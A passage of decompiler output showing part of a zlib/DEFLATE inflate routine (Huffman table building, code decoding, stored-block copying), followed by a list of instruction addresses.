																			goto L275;
																		}
																		__eflags = _t1091 - _t1187;
																		if(_t1091 >= _t1187) {
																			L265:
																			_t1091 = _t1091 - _v36;
																			_v12 = _v12 >> _t1187;
																			_t502 =  &_v16;
																			 *_t502 = _v16 + ((1 << _t1187) - 0x00000001 & _v12);
																			__eflags =  *_t502;
																			goto L266;
																		}
																		L259:
																		__eflags = _v8 - _v24;
																		if(_v8 < _v24) {
																			_t951 =  *_v8 & 0x000000ff;
																			_t492 =  &_v8;
																			 *_t492 = _v8 + 1;
																			__eflags =  *_t492;
																			L263:
																			_t952 = _t951 << _t1091;
																			_t1091 = _t1091 + 8;
																			_v12 = _v12 | _t952;
																			__eflags = _t1091 - _v36;
																			if(_t1091 < _v36) {
																				goto L259;
																			}
																			_t1187 = _v36;
																			goto L265;
																		}
																		L260:
																		__eflags = _a24 & 0x00000002;
																		if((_a24 & 0x00000002) != 0) {
																			_v20 = 1;
																			 *_t1381 = 0x19;
																			goto L396;
																		}
																		_t951 = 0;
																		goto L263;
																	}
																	__eflags = _t1091 - 0xf;
																	if(_t1091 < 0xf) {
																		_v8 = _v8 + 2;
																		_v12 = _v12 | ( *_v8 & 0x0000ffff) << _t1091;
																		_t1091 = _t1091 + 0x10;
																		__eflags = _t1091;
																	}
																	_t972 =  *((short*)(_t1381 + 0x160 + (_v12 & 0x000003ff) * 2));
																	__eflags = _t972;
																	if(_t972 < 0) {
																		_t1366 = 0xa;
																		do {
																			_t972 =  *((short*)(_t1381 + 0x960 + ((_v12 >> _t1366 & 0x00000001) +  !_t972) * 2));
																			_t1366 = _t1366 + 1;
																			__eflags = _t972;
																		} while (_t972 < 0);
																		goto L230;
																	} else {
																		_t1366 = _t972 >> 9;
																		L230:
																		_t1297 = _v28;
																		_v12 = _v12 >> _t1366;
																		_t1091 = _t1091 - _t1366;
																		 *_t1297 = _v16;
																		__eflags = _t972 & 0x00000100;
																		if((_t972 & 0x00000100) != 0) {
																			_t473 =  &_v28;
																			 *_t473 = _v28 + 1;
																			__eflags =  *_t473;
																			_v16 = _t972;
																			goto L256;
																		}
																		_v28 = _v28 + 2;
																		 *(_t1297 + 1) = _t972;
																		continue;
																	}
																}
															}
															__eflags = _t1091 - 0xf;
															if(_t1091 >= 0xf) {
																L248:
																_t905 =  *((short*)(_t1381 + 0x160 + (_v12 & 0x000003ff) * 2));
																__eflags = _t905;
																if(_t905 < 0) {
																	_t1348 = 0xa;
																	do {
																		_t905 =  *((short*)(_t1381 + 0x960 + ((_v12 >> _t1348 & 0x00000001) +  !_t905) * 2));
																		_t1348 = _t1348 + 1;
																		__eflags = _t905;
																	} while (_t905 < 0);
																	L252:
																	_v12 = _v12 >> _t1348;
																	_t1091 = _t1091 - _t1348;
																	_v16 = _t905;
																	__eflags = _t905 - 0x100;
																	if(_t905 >= 0x100) {
																		goto L256;
																	}
																	L253:
																	_t953 = _v28;
																	__eflags = _t953 - _v48;
																	if(_t953 >= _v48) {
																		_v20 = 2;
																		 *_t1381 = 0x18;
																		goto L396;
																	}
																	 *_t953 = _v16;
																	_v28 = _t953 + 1;
																	goto L215;
																}
																_t1348 = _t905 >> 9;
																_t905 = _t905 & 0x000001ff;
																goto L252;
															}
															__eflags = _t902 - 2;
															if(_t902 >= 2) {
																_t955 = _v8;
																_v8 =  &(_t955[2]);
																_v12 = _v12 | (_t955[1] & 0x000000ff) << _t1091 + 0x00000008 | ( *_t955 & 0x000000ff) << _t1091;
																_t1091 = _t1091 + 0x10;
																__eflags = _t1091;
																goto L248;
															}
															L234:
															_t959 =  *((short*)(_t1381 + 0x160 + (_v12 & 0x000003ff) * 2));
															__eflags = _t959;
															if(_t959 < 0) {
																_t1144 = 0xa;
																__eflags = _t1091 - _t1144;
																if(_t1091 <= _t1144) {
																	L241:
																	__eflags = _v8 - _v24;
																	if(_v8 < _v24) {
																		_t962 =  *_v8 & 0x000000ff;
																		_t448 =  &_v8;
																		 *_t448 = _v8 + 1;
																		__eflags =  *_t448;
																		L245:
																		_t963 = _t962 << _t1091;
																		_t1091 = _t1091 + 8;
																		_v12 = _v12 | _t963;
																		__eflags = _t1091 - 0xf;
																		if(_t1091 < 0xf) {
																			goto L234;
																		}
																		goto L248;
																	}
																	L242:
																	__eflags = _a24 & 0x00000002;
																	if((_a24 & 0x00000002) != 0) {
																		_v20 = 1;
																		 *_t1381 = 0x17;
																		goto L396;
																	}
																	_t962 = 0;
																	goto L245;
																} else {
																	goto L239;
																}
																while(1) {
																	L239:
																	_t959 =  *((short*)(_t1381 + 0x960 + ((_v12 >> _t1144 & 0x00000001) +  !_t959) * 2));
																	_t1144 = _t1144 + 1;
																	__eflags = _t959;
																	if(_t959 >= 0) {
																		goto L248;
																	}
																	_t441 = _t1144 + 1; // 0xc
																	__eflags = _t1091 - _t441;
																	if(_t1091 >= _t441) {
																		continue;
																	}
																	goto L241;
																}
																goto L248;
															}
															_t965 = _t959 >> 9;
															__eflags = _t965;
															if(_t965 == 0) {
																goto L241;
															}
															__eflags = _t1091 - _t965;
															if(_t1091 >= _t965) {
																goto L248;
															}
															goto L241;
														}
														_t209 =  &(_t1381[0x10]); // 0x40
														_t1368 = _t209 + _t900 * 0xda0;
														memset( &_v192, 0, 0x40);
														_t211 = _t1368 + 0x120; // 0x160
														memset(_t211, 0, 0x800);
														_t212 = _t1368 + 0x920; // 0x960
														memset(_t212, 0, 0x480);
														_t988 =  *((intOrPtr*)(_t1381 + 0x2c + _t1381[6] * 4));
														_t1383 = _t1383 + 0x24;
														_t1150 = 0;
														_v44 = _t988;
														__eflags = _t988;
														if(_t988 <= 0) {
															L143:
															_t1151 = 0;
															_t1104 = 0;
															__eflags = 0;
															_v124 = 0;
															_v128 = 0;
															_t989 = 4;
															do {
																_t1298 =  *((intOrPtr*)(_t1382 + _t989 - 0xbc));
																_t1151 = _t1151 + _t1298 + _t1151 + _t1298;
																 *((intOrPtr*)(_t1382 + _t989 - 0x78)) = _t1151;
																_t989 = _t989 + 4;
																_t1104 = _t1104 + _t1298;
																__eflags = _t989 - 0x3c;
															} while (_t989 <= 0x3c);
															__eflags = _t1151 - 0x10000;
															if(_t1151 == 0x10000) {
																L147:
																_v20 = _v20 | 0xffffffff;
																_v52 = _v52 & 0x00000000;
																__eflags = _v44;
																_t1091 = _v32;
																if(_v44 <= 0) {
																	L174:
																	__eflags = _t1381[6] - 2;
																	if(_t1381[6] != 2) {
																		L214:
																		_t1381[6] = _t1381[6] - 1;
																		goto L139;
																	}
																	_t300 =  &_v16;
																	 *_t300 = _v16 & 0x00000000;
																	__eflags =  *_t300;
																	L176:
																	__eflags = _v16 - _t1381[0xc] + _t1381[0xb];
																	if(_v16 >= _t1381[0xc] + _t1381[0xb]) {
																		_t992 = _t1381[0xb];
																		__eflags = _t1381[0xc] + _t992 - _v16;
																		if(_t1381[0xc] + _t992 != _v16) {
																			L357:
																			 *_t1381 = 0x15;
																			goto L395;
																		}
																		memcpy( &(_t1381[0x10]),  &(_t1381[0xa49]), _t992);
																		memcpy( &(_t1381[0x378]), _t1381 + _t1381[0xb] + 0x2924, _t1381[0xc]);
																		_t1383 = _t1383 + 0x18;
																		goto L214;
																	}
																	__eflags = _t1091 - 0xf;
																	if(_t1091 >= 0xf) {
																		L193:
																		_t1002 =  *((short*)(_t1381 + 0x1ca0 + (_v12 & 0x000003ff) * 2));
																		__eflags = _t1002;
																		if(_t1002 < 0) {
																			_t1369 = 0xa;
																			do {
																				_t1002 =  *((short*)(_t1381 + 0x24a0 + ((_v12 >> _t1369 & 0x00000001) +  !_t1002) * 2));
																				_t1369 = _t1369 + 1;
																				__eflags = _t1002;
																			} while (_t1002 < 0);
																			L197:
																			_v12 = _v12 >> _t1369;
																			_t1091 = _t1091 - _t1369;
																			_v40 = _t1002;
																			_v32 = _t1091;
																			__eflags = _t1002 - 0x10;
																			if(__eflags >= 0) {
																				if(__eflags != 0) {
																					L201:
																					_t1157 =  *((char*)(_t1002 + 0x3e6634));
																					_v36 = _t1157;
																					__eflags = _t1091 - _t1157;
																					if(_t1091 >= _t1157) {
																						L208:
																						_t1004 = _v40;
																						_t1091 = _t1091 - _t1157;
																						_v32 = _t1091;
																						_v12 = _v12 >> _t1157;
																						_t1375 = ((1 << _t1157) - 0x00000001 & _v12) +  *((char*)(_t1004 + 0x3e6638));
																						__eflags = _t1004 - 0x10;
																						if(_t1004 != 0x10) {
																							_t1005 = 0;
																							__eflags = 0;
																						} else {
																							_t1005 =  *( &(_t1381[0xa48]) + _v16) & 0x000000ff;
																						}
																						memset( &(_t1381[0xa49]) + _v16, _t1005, _t1375);
																						_t1383 = _t1383 + 0xc;
																						_v16 = _v16 + _t1375;
																						goto L176;
																					}
																					L202:
																					__eflags = _v8 - _v24;
																					if(_v8 < _v24) {
																						_t1012 =  *_v8 & 0x000000ff;
																						_t357 =  &_v8;
																						 *_t357 = _v8 + 1;
																						__eflags =  *_t357;
																						L206:
																						_t1013 = _t1012 << _t1091;
																						_t1091 = _t1091 + 8;
																						_v12 = _v12 | _t1013;
																						__eflags = _t1091 - _v36;
																						if(_t1091 < _v36) {
																							goto L202;
																						}
																						_t1157 = _v36;
																						goto L208;
																					}
																					L203:
																					__eflags = _a24 & 0x00000002;
																					if((_a24 & 0x00000002) != 0) {
																						_v20 = 1;
																						 *_t1381 = 0x12;
																						goto L396;
																					}
																					_t1012 = 0;
																					goto L206;
																				}
																				__eflags = _v16;
																				if(_v16 == 0) {
																					L355:
																					 *_t1381 = 0x11;
																					goto L395;
																				}
																				goto L201;
																			}
																			_v16 = _v16 + 1;
																			 *( &(_t1381[0xa49]) + _v16) = _t1002;
																			goto L176;
																		}
																		_t1369 = _t1002 >> 9;
																		_t1002 = _t1002 & 0x000001ff;
																		goto L197;
																	}
																	_t1014 = _v8;
																	__eflags = _v24 - _t1014 - 2;
																	if(_v24 - _t1014 >= 2) {
																		_t327 = _t1091 + 8; // 0xa
																		_v8 =  &(_t1014[2]);
																		_v12 = _v12 | (_t1014[1] & 0x000000ff) << _t327 | ( *_t1014 & 0x000000ff) << _t1091;
																		_t1091 = _t1091 + 0x10;
																		__eflags = _t1091;
																		goto L193;
																	}
																	L179:
																	_t1018 =  *((short*)(_t1381 + 0x1ca0 + (_v12 & 0x000003ff) * 2));
																	__eflags = _t1018;
																	if(_t1018 < 0) {
																		_t1163 = 0xa;
																		__eflags = _t1091 - _t1163;
																		if(_t1091 <= _t1163) {
																			L186:
																			__eflags = _v8 - _v24;
																			if(_v8 < _v24) {
																				_t1021 =  *_v8 & 0x000000ff;
																				_t322 =  &_v8;
																				 *_t322 = _v8 + 1;
																				__eflags =  *_t322;
																				L190:
																				_t1022 = _t1021 << _t1091;
																				_t1091 = _t1091 + 8;
																				_v12 = _v12 | _t1022;
																				__eflags = _t1091 - 0xf;
																				if(_t1091 < 0xf) {
																					goto L179;
																				}
																				goto L193;
																			}
																			L187:
																			__eflags = _a24 & 0x00000002;
																			if((_a24 & 0x00000002) != 0) {
																				_v20 = 1;
																				 *_t1381 = 0x10;
																				goto L396;
																			}
																			_t1021 = 0;
																			goto L190;
																		} else {
																			goto L184;
																		}
																		while(1) {
																			L184:
																			_t1018 =  *((short*)(_t1381 + 0x24a0 + ((_v12 >> _t1163 & 0x00000001) +  !_t1018) * 2));
																			_t1163 = _t1163 + 1;
																			__eflags = _t1018;
																			if(_t1018 >= 0) {
																				goto L193;
																			}
																			_t315 = _t1163 + 1; // 0xc
																			__eflags = _t1091 - _t315;
																			if(_t1091 >= _t315) {
																				continue;
																			}
																			goto L186;
																		}
																		goto L193;
																	}
																	_t1024 = _t1018 >> 9;
																	__eflags = _t1024;
																	if(_t1024 == 0) {
																		goto L186;
																	}
																	__eflags = _t1091 - _t1024;
																	if(_t1091 >= _t1024) {
																		goto L193;
																	}
																	goto L186;
																} else {
																	goto L148;
																}
																do {
																	L148:
																	_t1168 =  *(_v52 + _t1368) & 0x000000ff;
																	_t1025 = 0;
																	__eflags = _t1168;
																	if(_t1168 == 0) {
																		goto L173;
																	}
																	_t1312 = _t1382 + _t1168 * 4 - 0x7c;
																	_t1105 =  *_t1312;
																	_v44 = _t1105;
																	 *_t1312 = _t1105 + 1;
																	_t1313 = _t1168;
																	__eflags = _t1168;
																	if(_t1168 == 0) {
																		L151:
																		__eflags = _t1168 - 0xa;
																		if(_t1168 > 0xa) {
																			_t276 = (_t1025 & 0x000003ff) * 2; // 0x160
																			_t1107 = _t1368 + _t276 + 0x120;
																			_t1316 =  *_t1107;
																			__eflags = _t1316;
																			if(_t1316 == 0) {
																				_t1316 = _v20;
																				_t279 =  &_v20;
																				 *_t279 = _v20 - 2;
																				__eflags =  *_t279;
																				 *_t1107 = _t1316;
																			}
																			_t1027 = _t1025 >> 9;
																			__eflags = _t1168 - 0xb;
																			if(_t1168 <= 0xb) {
																				L171:
																				_t1030 = (_t1027 >> 0x00000001 & 0x00000001) - _t1316;
																				__eflags = _t1030;
																				 *((short*)(_t1368 + 0x91e + _t1030 * 2)) = _v52;
																				L172:
																				_t1091 = _v32;
																				goto L173;
																			} else {
																				_t1108 = _t1168 - 0xb;
																				do {
																					_t1027 = _t1027 >> 1;
																					_t1175 = _t1368 + (0x48f - _t1316 - (_t1027 & 0x00000001)) * 2;
																					_t1318 =  *0x48f & 0x0000ffff;
																					__eflags = _t1318;
																					if(_t1318 != 0) {
																						_t1316 = _t1318;
																					} else {
																						_t1316 = _v20;
																						_v20 = _v20 - 2;
																						 *_t1175 = _t1316;
																					}
																					_t1108 = _t1108 - 1;
																					__eflags = _t1108;
																				} while (_t1108 != 0);
																				goto L171;
																			}
																		}
																		_v44 = (_t1168 << 0x00000009 | _v52) & 0x0000ffff;
																		__eflags = _t1025 - 0x400;
																		if(_t1025 >= 0x400) {
																			goto L172;
																		}
																		__eflags = 1;
																		_t250 = _t1025 * 2; // 0x160
																		_t1176 = _t1368 + _t250 + 0x120;
																		do {
																			_t1025 = _t1025 + 1;
																			 *_t1176 = _v44;
																			_t1176 = _t1176 + 2;
																			__eflags = _t1025 - 0x400;
																		} while (_t1025 < 0x400);
																		goto L172;
																	} else {
																		goto L150;
																	}
																	do {
																		L150:
																		_v44 = _v44 >> 1;
																		_t1025 = _t1025 + _t1025 | _v44 & 0x00000001;
																		_t1313 = _t1313 - 1;
																		__eflags = _t1313;
																	} while (_t1313 != 0);
																	goto L151;
																	L173:
																	_v52 = _v52 + 1;
																	_t1026 = _t1381[6];
																	__eflags = _v52 -  *((intOrPtr*)(_t1381 + 0x2c + _t1026 * 4));
																} while (_v52 <  *((intOrPtr*)(_t1381 + 0x2c + _t1026 * 4)));
																goto L174;
															}
															__eflags = _t1104 - 1;
															if(_t1104 > 1) {
																_t1091 = _v32;
																L353:
																 *_t1381 = 0x23;
																goto L395;
															}
															goto L147;
														}
														_t1299 =  *(_t1381 + 0x2c + _t1381[6] * 4);
														do {
															 *((intOrPtr*)(_t1382 + ( *(_t1150 + _t1368) & 0x000000ff) * 4 - 0xbc)) =  *((intOrPtr*)(_t1382 + ( *(_t1150 + _t1368) & 0x000000ff) * 4 - 0xbc)) + 1;
															_t1150 = _t1150 + 1;
															__eflags = _t1150 - _t1299;
														} while (_t1150 < _t1299);
														goto L143;
													}
													_t172 = _t1347 + 0x3e6640; // 0x2000405
													_t1177 =  *_t172;
													__eflags = _t1091 - _t1177;
													if(_t1091 >= _t1177) {
														L135:
														 *(_t1381 + 0x2c + _t1347 * 4) = (1 << _t1177) - 0x00000001 & _v12;
														_t189 = _t1347 + 0x3e6640; // 0x40505
														_t1178 =  *_t189;
														_v12 = _v12 >> _t1178;
														 *(_t1381 + 0x2c + _t1347 * 4) =  *(_t1381 + 0x2c + _t1347 * 4) +  *((intOrPtr*)(0x3e6634 + _t1347 * 4));
														_t1091 = _t1091 - _t1178;
														_v32 = _t1091;
														_t1347 = _t1347 + 1;
														goto L127;
													}
													L129:
													__eflags = _v8 - _v24;
													if(_v8 < _v24) {
														_t1043 =  *_v8 & 0x000000ff;
														_t179 =  &_v8;
														 *_t179 = _v8 + 1;
														__eflags =  *_t179;
														L133:
														_t1044 = _t1043 << _t1091;
														_t1091 = _t1091 + 8;
														_v12 = _v12 | _t1044;
														_t1045 = _v16;
														_t184 = _t1045 + 0x3e6640; // 0x40505
														_t1177 =  *_t184;
														__eflags = _t1091 - _t1177;
														if(_t1091 < _t1177) {
															goto L129;
														}
														_t1347 = _t1045;
														goto L135;
													}
													L130:
													__eflags = _a24 & 0x00000002;
													if((_a24 & 0x00000002) != 0) {
														_v20 = 1;
														 *_t1381 = 0xb;
														goto L396;
													}
													_t1043 = 0;
													goto L133;
												}
												_t1180 = 8;
												_t1112 =  &(_t1381[0x10]);
												_t1381[0xb] = 0x120;
												_t1381[0xc] = 0x20;
												memset( &(_t1381[0x378]), 0x5050505, _t1180 << 2);
												memset(_t1112, 8, 0x90);
												_t1113 = _t1112 + 0x90;
												memset(_t1113, 9, 0x70);
												_t1182 = 6;
												memset(_t1113 + 0x70, 0x7070707, _t1182 << 2);
												_t1383 = _t1383 + 0x30;
												_t1091 = _v32;
												asm("stosd");
												asm("stosd");
												goto L139;
											}
											__eflags = _a24 & 0x00000001;
											if((_a24 & 0x00000001) == 0) {
												goto L392;
											}
											_t1336 = _v24;
											L369:
											__eflags = _t1091 - (_t1091 & 0x00000007);
											if(_t1091 < (_t1091 & 0x00000007)) {
												__eflags = _v8 - _t1336;
												if(_v8 < _t1336) {
													_t875 =  *_v8 & 0x000000ff;
													_t696 =  &_v8;
													 *_t696 = _v8 + 1;
													__eflags =  *_t696;
													L368:
													_v12 = _v12 | _t875 << _t1091;
													_t1091 = _t1091 + 8;
													__eflags = _t1091;
													goto L369;
												}
												L365:
												__eflags = _a24 & 0x00000002;
												if((_a24 & 0x00000002) != 0) {
													_v20 = 1;
													 *_t1381 = 0x20;
													goto L396;
												}
												_t875 = 0;
												goto L368;
											}
											_t1186 = _t1091 & 0x00000007;
											_v12 = _v12 >> _t1186;
											_t1091 = _t1091 - _t1186;
											_v16 = _v16 & 0x00000000;
											goto L384;
										}
										__eflags = _t1091;
										if(_t1091 != 0) {
											goto L95;
										}
										L103:
										__eflags = _v16;
										if(_v16 == 0) {
											goto L113;
										}
										L104:
										__eflags = _v28 - _v48;
										if(_v28 >= _v48) {
											_v20 = 2;
											 *_t1381 = 9;
											goto L396;
										}
										L105:
										__eflags = _v8 - _t1336;
										if(_v8 >= _t1336) {
											__eflags = _a24 & 0x00000002;
											if((_a24 & 0x00000002) == 0) {
												goto L393;
											}
											_v20 = 1;
											 *_t1381 = 0x26;
											goto L396;
										}
										_t880 = _v48 - _v28;
										_t1379 = _t1336 - _v8;
										_t1222 = _t880;
										__eflags = _t880 - _t1379;
										if(_t880 >= _t1379) {
											_t1222 = _t1379;
										}
										__eflags = _t1222 - _v16;
										if(_t1222 >= _v16) {
											_t1379 = _v16;
										} else {
											__eflags = _t880 - _t1379;
											if(_t880 < _t1379) {
												_t1379 = _t880;
											}
										}
										memcpy(_v28, _v8, _t1379);
										_v8 = _v8 + _t1379;
										_v28 = _v28 + _t1379;
										_t1383 = _t1383 + 0xc;
										_v16 = _v16 - _t1379;
										_t1336 = _v24;
										goto L103;
									}
									__eflags = _v8 - _t1336;
									if(_v8 >= _t1336) {
										goto L92;
									}
									_t852 =  *_v8 & 0x000000ff;
									_v8 = _v8 + 1;
									goto L94;
								}
								_t852 =  *_t1243 & 0x000000ff;
								_v8 =  &(_t1243[1]);
								goto L94;
							}
							_t1053 = _t851 - 1;
							__eflags = _t1053;
							if(_t1053 == 0) {
								goto L99;
							}
							__eflags = _t1053 == 1;
							if(_t1053 == 1) {
								goto L301;
							}
							goto L396;
						}
						if(__eflags == 0) {
							goto L105;
						}
						__eflags = _t821 - 0x22;
						if(__eflags > 0) {
							_t1055 = _t821 - 0x23;
							__eflags = _t1055;
							if(_t1055 == 0) {
								goto L353;
							}
							_t1056 = _t1055 - 1;
							__eflags = _t1056;
							if(_t1056 == 0) {
								L36:
								 *_t1381 = 0x24;
								goto L395;
							}
							__eflags = _t1056 != 1;
							if(_t1056 != 1) {
								goto L396;
							}
							goto L81;
						}
						if(__eflags == 0) {
							goto L392;
						}
						_t1058 = _t821 - 0x19;
						__eflags = _t1058;
						if(_t1058 == 0) {
							__eflags = _t1243 - _t1336;
							if(_t1243 >= _t1336) {
								goto L260;
							}
							_t951 =  *_t1243 & 0x000000ff;
							_v8 =  &(_t1243[1]);
							goto L263;
						}
						_t1059 = _t1058 - 1;
						__eflags = _t1059;
						if(_t1059 == 0) {
							__eflags = _t1243 - _t1336;
							if(_t1243 >= _t1336) {
								goto L276;
							}
							_t940 =  *_t1243 & 0x000000ff;
							_v8 =  &(_t1243[1]);
							goto L279;
						}
						_t1060 = _t1059 - 1;
						__eflags = _t1060;
						if(_t1060 == 0) {
							__eflags = _t1243 - _t1336;
							if(_t1243 >= _t1336) {
								goto L289;
							}
							_t926 =  *_t1243 & 0x000000ff;
							_v8 =  &(_t1243[1]);
							goto L292;
						}
						__eflags = _t1060 != 5;
						if(_t1060 != 5) {
							goto L396;
						}
						__eflags = _t1243 - _t1336;
						if(_t1243 >= _t1336) {
							goto L365;
						}
						_t875 =  *_t1243 & 0x000000ff;
						_v8 =  &(_t1243[1]);
						goto L368;
					}
					if(_t1389 == 0) {
						goto L253;
					}
					_t1390 = _t821 - 0xa;
					if(_t1390 > 0) {
						_t1062 = _t821 - 0xb;
						__eflags = _t1062;
						if(_t1062 == 0) {
							_t1226 = _t1243;
							__eflags = _t1226 - _t1336;
							if(_t1226 >= _t1336) {
								goto L130;
							}
							_t1043 =  *_t1226 & 0x000000ff;
							_v8 =  &(_t1226[1]);
							goto L133;
						}
						_t1063 = _t1062 - 3;
						__eflags = _t1063;
						if(_t1063 == 0) {
							_t1228 = _t1243;
							__eflags = _t1228 - _t1336;
							if(_t1228 >= _t1336) {
								goto L157;
							}
							_t896 =  *_t1228 & 0x000000ff;
							_v8 =  &(_t1228[1]);
							goto L160;
						}
						_t1065 = _t1063;
						__eflags = _t1065;
						if(_t1065 == 0) {
							_t1230 = _t1243;
							__eflags = _t1230 - _t1336;
							if(_t1230 >= _t1336) {
								goto L187;
							}
							_t1021 =  *_t1230 & 0x000000ff;
							_v8 =  &(_t1230[1]);
							goto L190;
						}
						_t1066 = _t1065 - 1;
						__eflags = _t1066;
						if(_t1066 == 0) {
							goto L355;
						}
						_t1067 = _t1066 - 1;
						__eflags = _t1067;
						if(_t1067 == 0) {
							_t1232 = _t1243;
							__eflags = _t1232 - _t1336;
							if(_t1232 >= _t1336) {
								goto L203;
							}
							_t1012 =  *_t1232 & 0x000000ff;
							_v8 =  &(_t1232[1]);
							goto L206;
						}
						_t1068 = _t1067 - 3;
						__eflags = _t1068;
						if(_t1068 == 0) {
							goto L357;
						}
						__eflags = _t1068 != 0;
						if(_t1068 != 0) {
							goto L396;
						}
						_t1234 = _t1243;
						__eflags = _t1234 - _t1336;
						if(_t1234 >= _t1336) {
							goto L242;
						}
						_t962 =  *_t1234 & 0x000000ff;
						_v8 =  &(_t1234[1]);
						goto L245;
					}
					if(_t1390 == 0) {
						goto L349;
					}
					if(_t821 > 9) {
						goto L396;
					}
					switch( *((intOrPtr*)(_t821 * 4 +  &M003D390B))) {
						case 0:
							_t1091 = 0;
							_t1381[3] = 0;
							_t1381[2] = 0;
							_v36 = 0;
							_v16 = 0;
							_v40 = 0;
							_v32 = 0;
							_v12 = 0;
							_t1381[7] = 1;
							_t1381[4] = 1;
							if((_a24 & 1) == 0) {
								goto L121;
							}
							goto L12;
						case 1:
							L12:
							_t1073 = _t1243;
							if(_t1073 >= _t1336) {
								__eflags = _a24 & 0x00000002;
								if((_a24 & 0x00000002) == 0) {
									_t54 =  &(_t1381[2]);
									 *_t54 = _t1381[2] & 0x00000000;
									__eflags =  *_t54;
									goto L17;
								}
								_v20 = 1;
								 *_t1381 = 1;
								goto L396;
							} else {
								_t1381[2] =  *_t1073 & 0x000000ff;
								_v8 =  &(_t1073[1]);
								L17:
								_t1074 = _v8;
								if(_t1074 >= _t1336) {
									goto L21;
								}
								_v8 = _v8 + 1;
								_t1381[3] =  *_t1074 & 0x000000ff;
								goto L24;
							}
						case 2:
							__eax = __edx;
							__eflags = __eax - __edi;
							if(__eax >= __edi) {
								L21:
								__eflags = _a24 & 0x00000002;
								if((_a24 & 0x00000002) == 0) {
									_t66 =  &(_t1381[3]);
									 *_t66 = _t1381[3] & 0x00000000;
									__eflags =  *_t66;
									L24:
									_t1380 = _t1381[2];
									_t1236 = _t1381[3];
									_push(0x1f);
									_pop(_t1114);
									_t1334 = ((_t1380 << 8) + _t1236) % _t1114;
									if(_t1334 != 0 || (_t1236 & 0x00000020) != 0 || (_t1380 & 0x0000000f) != 8) {
										_v16 = 1;
									} else {
										_v16 = _v16 & _t1334;
									}
									if(_v44 == 0) {
										_t1081 = 1 << (_t1380 >> 4) + 8;
										if(1 > 0x8000 || _v60 + 1 < _t1081) {
											_t1083 = 1;
											__eflags = 1;
										} else {
											_t1083 = 0;
										}
										_v16 = _v16 | _t1083;
									}
									_t1091 = _v32;
									if(_v16 == 0) {
										goto L121;
									} else {
										goto L36;
									}
								}
								_v20 = 1;
								 *_t1381 = 2;
								goto L396;
							}
							__ecx =  *__eax & 0x000000ff;
							__eax = __eax + 1;
							 *(__esi + 0xc) = __ecx;
							_v8 = __eax;
							goto L24;
						case 3:
							__ecx = __edx;
							__eflags = __ecx - __edi;
							if(__ecx >= __edi) {
								goto L117;
							}
							__eax =  *__ecx & 0x000000ff;
							_v8 = __ecx;
							goto L120;
						case 4:
							goto L396;
						case 5:
							__ecx = __edx;
							__eflags = __ecx - __edi;
							if(__ecx >= __edi) {
								goto L318;
							}
							__eax =  *__ecx & 0x000000ff;
							_v8 = __ecx;
							goto L321;
						case 6:
							__ecx = __edx;
							__eflags = __ecx - __edi;
							if(__ecx >= __edi) {
								goto L330;
							}
							__eax =  *__ecx & 0x000000ff;
							_v8 = __ecx;
							goto L333;
						case 7:
							__eax = __edx;
							__eflags = __eax - __edi;
							if(__eax >= __edi) {
								goto L327;
							}
							__cl =  *__eax;
							__edx = _v16;
							__eax = __eax + 1;
							 *((char*)(_v16 + __esi + 0x2920)) = __cl;
							_v8 = __eax;
							goto L337;
						case 8:
							goto L104;
					}
				}
			}

















































































































































































    0x003d257b
    0x003d2587
    0x003d258a
    0x003d258f
    0x003d2598
    0x003d259d
    0x003d25a3
    0x003d25a5
    0x003d25a8
    0x003d25ab
    0x003d25ae
    0x003d25b1
    0x003d25b4
    0x003d25bb
    0x003d25bb
    0x003d25be
    0x003d25be
    0x003d25b6
    0x003d25b6
    0x003d25b6
    0x003d25c2
    0x003d25c5
    0x003d25ca
    0x003d38fb
    0x003d38fe
    0x003d3901
    0x003d3901
    0x003d3906
    0x00000000
    0x003d25d9
    0x003d25dc
    0x003d25df
    0x003d25e2
    0x003d25e8
    0x003d25ee
    0x003d25f4
    0x003d25f7
    0x003d25f9
    0x003d25fc
    0x003d25ff
    0x003d2602
    0x003d282c
    0x003d282f
    0x003d28cc
    0x003d28cc
    0x003d28cf
    0x003d37b5
    0x003d37b5
    0x003d37bb
    0x003d37bb
    0x003d37bf
    0x003d37c5
    0x003d37cb
    0x003d37d1
    0x003d37d7
    0x003d37dd
    0x003d37e6
    0x003d37e9
    0x003d37ee
    0x003d37f8
    0x003d37fa
    0x003d38f3
    0x00000000
    0x003d380a
    0x003d380e
    0x003d3811
    0x003d381b
    0x003d3824
    0x003d3828
    0x003d382b
    0x003d382e
    0x003d38d3
    0x003d38d6
    0x003d38dc
    0x003d38df
    0x003d38ec
    0x003d38ec
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003d3834
    0x003d3834
    0x003d3834
    0x003d383a
    0x003d383e
    0x003d3890
    0x003d3890
    0x003d3896
    0x00000000
    0x00000000
    0x003d3898
    0x003d389b
    0x003d389e
    0x003d38a0
    0x003d38a1
    0x003d38a3
    0x003d38a3
    0x00000000
    0x003d389b
    0x003d3840
    0x003d3842
    0x003d3845
    0x003d384d
    0x003d3855
    0x003d385d
    0x003d3863
    0x003d3869
    0x003d3871
    0x003d3879
    0x003d3881
    0x003d3883
    0x003d3889
    0x003d388b
    0x00000000
    0x003d38a6
    0x003d38b8
    0x003d38c1
    0x003d38c1
    0x003d38c4
    0x003d38cb
    0x003d38cb
    0x00000000
    0x003d3834
    0x003d37fa
    0x003d28d5
    0x003d28d5
    0x003d28d6
    0x003d37ad
    0x003d37ad
    0x00000000
    0x003d37ad
    0x003d28dc
    0x003d28dc
    0x003d28dd
    0x003d3712
    0x003d3714
    0x003d371f
    0x003d371f
    0x003d3723
    0x003d3783
    0x003d378a
    0x00000000
    0x003d378a
    0x003d3725
    0x003d3725
    0x003d3727
    0x003d372b
    0x003d372e
    0x003d372e
    0x003d3731
    0x003d3731
    0x003d3734
    0x003d3746
    0x003d374a
    0x003d374e
    0x003d374e
    0x003d3751
    0x003d3759
    0x003d3759
    0x003d3759
    0x003d375c
    0x003d375f
    0x003d375f
    0x003d3763
    0x003d37a1
    0x003d37a1
    0x003d37a5
    0x00000000
    0x003d37a5
    0x003d3765
    0x003d3767
    0x00000000
    0x00000000
    0x003d3769
    0x003d376c
    0x003d377b
    0x003d377e
    0x00000000
    0x003d377e
    0x003d376e
    0x003d376e
    0x003d3772
    0x003d3792
    0x003d3799
    0x00000000
    0x003d3799
    0x003d3774
    0x00000000
    0x003d3774
    0x003d3736
    0x003d3739
    0x00000000
    0x00000000
    0x003d373e
    0x003d3741
    0x00000000
    0x003d3741
    0x003d3716
    0x003d371a
    0x00000000
    0x003d371a
    0x003d28e3
    0x003d28e3
    0x003d28e4
    0x003d3705
    0x003d3707
